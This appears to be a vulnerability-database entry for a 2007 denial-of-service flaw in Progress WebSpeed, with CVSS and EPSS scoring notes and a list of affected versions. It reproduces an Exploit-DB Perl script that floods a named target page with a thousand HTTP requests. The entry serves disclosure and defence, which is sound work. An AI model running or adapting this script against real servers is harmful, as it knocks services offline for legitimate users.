Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.8 |
|
AV:N/AC:L/Au:N/C:N/I:N/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 29943
Publication date : 2007-05-01 22h00 +00:00
Author : Eelko Neven
EDB Verified : Yes
//source: https://www.securityfocus.com/bid/23778/info
//
//WebSpeed is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.
//
//Successful exploits can allow attackers to cause the application to become unresponsive, denying service to legitimate users.
if(!$ARGV[0]){
print "U.LP.O.W\n";
print "www.ulpow.net\n";
print "The Eliminators of the Web\n";
print "Usage:perl webspeed.pl targetsite targetpage\n";
} else {
$site = $ARGV[0];
$page = $ARGV[1];
print "Attack Started\n";
$ish=1;
do {
$ish++;
use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $site,
PeerPort => 80,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Couldn't Connect to target please check again
address!\n";
print $socket "GET $page HTTP/1.0\r\n";
close($socket);
} while ($ish < 1000);
print ":-; Attack Complete\n";
}
Products Mentioned
Configuraton 0
Progress>>Progress >> Version 9.1e
Progress>>Webspeed >> Version 3.0
Progress>>Webspeed >> Version 3.1a
Progress>>Webspeed >> Version 3.1d
Progress>>Webspeed >> Version 3.1e
References